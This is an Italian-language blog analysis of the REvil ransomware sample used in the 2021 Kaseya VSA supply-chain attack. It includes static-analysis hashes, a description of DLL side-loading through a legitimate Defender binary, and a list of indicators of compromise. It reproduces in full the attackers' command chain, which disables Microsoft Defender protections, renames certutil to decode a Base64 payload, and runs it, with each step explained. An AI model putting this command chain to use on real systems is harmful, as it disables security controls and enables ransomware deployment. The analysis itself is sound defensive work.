Analisi sample Revil kaseya

Pubblicato da frtg il

Il 2 luglio Kaseya ha pubblicato un avviso in cui affermava di essere sotto attacco informatico con impatti sulla suite VSA. Tale software consente di eseguire la gestione delle patch e il monitoraggio delle infrastrutture e sistemi informatici.
Nei giorni successivi si è scoperto essere un attacco Ransomware di tipo Supply-chain.

Blog criminale con richiesta di riscatto

Inizio della compromissione

Il payload malevolo è stato inviato ai server VSA e, a sua volta, alle applicazioni Agent VSA in esecuzione sui dispositivi Windows gestiti. Ciò ha fornito a Revil e all’operator specifico la possibilità di avviare l’attacco. In questo modo, i criminali hanno:

Tutto ciò che viene eseguito dal Kaseya Agent Monitor viene quindi ignorato a causa di tali esclusioni, che hanno permesso ai criminali di distribuire il proprio dropper senza controllo.

Pe poter causare maggior danni ed essere eseguito in maniera indisturbata, i criminali hanno forzato tramite il software Kaseya la disabilitazione del software AntiVirus e avviato il Ransomwre tramite il comando :

C:\WINDOWS\system32\cmd.exe” /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true – EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode – Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

ping 127.0.0.1 -n 4979> nul 
Viene utilizzato come timer, eseguendo un certo numero random (in questo caso 4979) di volte “echo null” a localhost.

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Contiene un comando PowerShell per disabilitare la protezione di Microsoft Defender andando a disabilitare le seguenti features:

  • Real-time protection
  • Network protection against exploitation of known vulnerabilities
  • Scanning of all downloaded files and attachments
  • Scanning of scripts
  • Ransomware protection
  • Protection that prevents any application from gaining access to dangerous domains that may host phishing scams, exploits, and other malicious content on the Internet
  • Sharing of potential threat information with Microsoft Active Protection Service (MAPS)
  • Automatic sample submission to Microsoft

copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe 
Crea una copia dell’utility dei servizi certificati e la posiziona in C:\Windows\cert.exe.
È possibile utilizzare certutil.exe per eseguire il dump e visualizzare le informazioni di configurazione dell’autorità di certificazione (CA), configurare i servizi certificati, i componenti CA di backup e ripristino e verificare i certificati, le coppie di chiavi e le catene di certificati.

echo %RANDOM% >> C:\Windows\cert.exe
Appende alla fine del file un numero casuale alla fine del file cert.exe per cercare di evadere le soluzioni di sicurezza che controllano che l’hash di cert.exe

C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe
La copia di CERTUTIL viene usata per decodificare il payload cifrato in Base64 del file AGENT.CRT e lo scrive nell’eseguibile AGENT.EXE, nella working directory di Kaseya.

del /q /f c:\kworking\agent.crt C:\Windows\cert.exe
Il file di payload originale C:\KWORKING\AGENT.CRT  e la copia di CERTUTIL vengono cancellati.

c:\kworking\agent.exe
In fine, il processo AGENTMON.EXE esegue AGENT.EXE. In tal modo, il nuovo processo eredita i privilegi di sistema di AGENTMON e ha inizio il dropping del ransomware.

Analisi Statica

File iniziale

Tag

Dropper

Dettagli
original name AGENT.EXE
md5561CFFBABA71A6E8CC1CDCEDA990EAD4
sha15162F14D75E96EDB914D1756349D6E11583DB0B0
sha256D55F983C994CAA160EC63A59F6B4250FE67FB3E8C43A388AEC60A4A6978E9F1E
file-size912264 (bytes)
entropy6.952
imphash59349B1648EDDF021C01F05A17A0E870
file-typeexecutable
cpu32-bit
Virustotalscore 44/68
Descrizione

File firmato da PB03 TRANSPORT LTD risultante essere il malware dropper di Revil/Sodinokibi. Tale dropper ha lo scopo di creare due file nel percorso hardcoded “C:\Windows\”. I due payload sono contenuti all’interno del dropper stesso, attraverso il riferimento a due risorse.

Risorse all’interno del dropper

Primo file droppato

Tag

Microsoft Windows Defender

Dettagli
original name MsMpEng.exe
md58CC83221870DD07144E63DF594C391D9
sha13D409B39B8502FCD23335A878F2CBDAF6D721995
sha25633BC14D231A4AFAA18F06513766D5F69D8B88F1E697CD127D24FB4B72AD44C7A
file-size22224 (bytes)
entropy6.803
descriptionAntimalware Service Executable
file-typeexecutable
cpu32-bit
Virustotalscore 0/68
Descrizione

Il file risulta essere una copia legittima di Microsoft Windows Defender (MsMpEng.exe).
Dopo aver eseguito il side-load della dll malevola, questa copia di Defender viene sfruttata per eseguire la fase di crittografia dei file attraverso un processo legittimo.


Secondo file droppato

Tag

Revil

Dettagli

original name MpSvc.dll
md5A47CF00AEDF769D60D58BFE00C0B5421
sha1656C4D285EA518D90C1B669B79AF475DB31E30B1
sha2568DD620D9AEB35960BB766458C8890EDE987C33D239CF730F93FE49D90AE759DD
entropy6.979
imphashC699899ABB1119ED2B5C97D5D1D4542E
file-typedynamic-link-library
cpu32-bit
file-size808328 (bytes)
Virustotalscore 48/68

Dettagli

Dll malevola contenete il payload di Revil e che viene caricata nel legittimo eseguibile di Windows Defender per eseguire le operazioni di crittografia.
La dll esporta tre funzioni: ServiceCrtMainServiceMain,  SvchostPushServiceGlobals.
Tramite ServiceCrtMain avviene il recupero e l’esecuzione delle istruzioni dannose.

Export della dll malevola

Indicatori di Compromissione (IOC) 

Indicator_typeDataNote
file_path_nameC:\windows\cert.exeCopied CERTUTIL
file_path_nameC:\windows\msmpeng.exeOutdated Defender executable vulnerable to DLL sideload
sha25633bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7aOutdated Defender executable vulnerable to DLL sideload
file_path_nameC:\kworking\agent.crtRevil dropper used in Kaseya exploit
sha256d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1Revil dropper used in Kaseya exploit
file_path_nameC:\windows\mpsvc.dllRevil ransomware DLL
sha2568dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759ddRevil ransomware DLL
domainncuccr.org 
domain1team.es 
domain4net.guru 
domain35-40konkatsu.net 
domain123vrachi.ru 
domain4youbeautysalon.com 
domain12starhd.online 
domain101gowrie.com 
domain8449nohate.org 
domain1kbk.com.ua 
domain365questions.org 
domain321play.com.hk 
domaincandyhouseusa.com 
domainandersongilmour.co.uk 
domainfacettenreich27.de 
domainblgr.be 
domainfannmedias.com 
domainsoutheasternacademyofprosthodontics.org 
domainfilmstreamingvfcomplet.be 
domainsmartypractice.com 
domaintanzschule-kieber.de 
domainiqbalscientific.com 
domainpasvenska.se 
domaincursosgratuitosnainternet.com 
domainbierensgebakkramen.nl 
domainc2e-poitiers.com 
domaingonzalezfornes.es 
domaintonelektro.nl 
domainmilestoneshows.com 
domainblossombeyond50.com 
domainthomasvicino.com 
domainkaotikkustomz.com 
domainmindpackstudios.com 
domainfaroairporttransfers.net 
domaindaklesa.de 
domainbxdf.info 
domainsimoneblum.de 
domaingmto.fr 
domaincerebralforce.net 
domainmyhostcloud.com 
domainfotoscondron.com 
domainsw1m.ru 
domainhomng.net